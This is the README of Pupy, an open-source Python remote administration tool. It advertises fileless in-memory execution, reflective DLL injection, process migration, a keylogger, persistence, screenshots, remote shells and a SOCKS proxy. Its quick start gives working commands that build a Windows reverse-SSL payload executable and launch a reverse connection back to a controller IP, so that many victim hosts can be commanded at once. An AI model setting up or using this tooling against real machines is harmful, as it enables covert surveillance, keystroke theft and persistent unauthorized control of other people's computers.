# Pupy

Pupy is an open-source RAT (Remote Administration Tool) written in Python. Pupy uses reflective DLL injection and leaves no traces on disk.

## Features :

- On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
- Pupy can reflectively migrate into other processes
- Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
- modules are quite simple to write and Pupy is easily extensible.
- Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access Python objects on the remote client
  - we can also access remote objects interactively from the pupy shell, and even auto-completion of remote attributes works!
- the communication channel currently works as an SSL reverse connection, but a bind payload will be implemented in the future
- all the non-interactive modules can be dispatched on multiple hosts in one command
- Multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu)
- modules can be executed as background jobs
- commands and scripts running on remote hosts are interruptible
- auto-completion and nice colored output :-)
- command aliases can be defined in the config

## Implemented Modules :

- migrate (Windows only)
  - inter-process architecture injection also works (x86->x64 and x64->x86)
- keylogger (Windows only)
- persistence (Windows only)
- screenshot (Windows only)
- command execution
- download
- upload
- socks5 proxy
- interactive shell (cmd.exe, /bin/sh, ...)
- interactive Python shell

## Quick start

In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1.
The clients have been tested on Windows 7, Windows XP, Kali Linux, Ubuntu and Mac OS X 10.10.5.

### generate/run a payload

#### for Windows

```bash
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
```

#### for Linux

```bash
pip install rpyc # (or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```

#### for Mac OS X

```bash
easy_install rpyc # (or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```

### having fun

1. optionally edit pupy.conf to change the bind address / port
2. start the pupy server:

   ```bash
   ./pupysh.py
   ```

3. type "clients" to display connected clients

### Some screenshots

##### list connected clients

![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")

##### help

![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")

##### execute python code on all clients

![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")

##### execute a command on all clients; the exception is retrieved in case the command does not exist

![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")

##### use a filter to send a module only to selected clients

![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")

##### migrate into another process

![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")

## Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)

## Contact

Don't hesitate to send me your feedback or any issue you may find.

mail: contact@n1nj4.eu

[Follow me on twitter](https://twitter.com/n1nj4sec)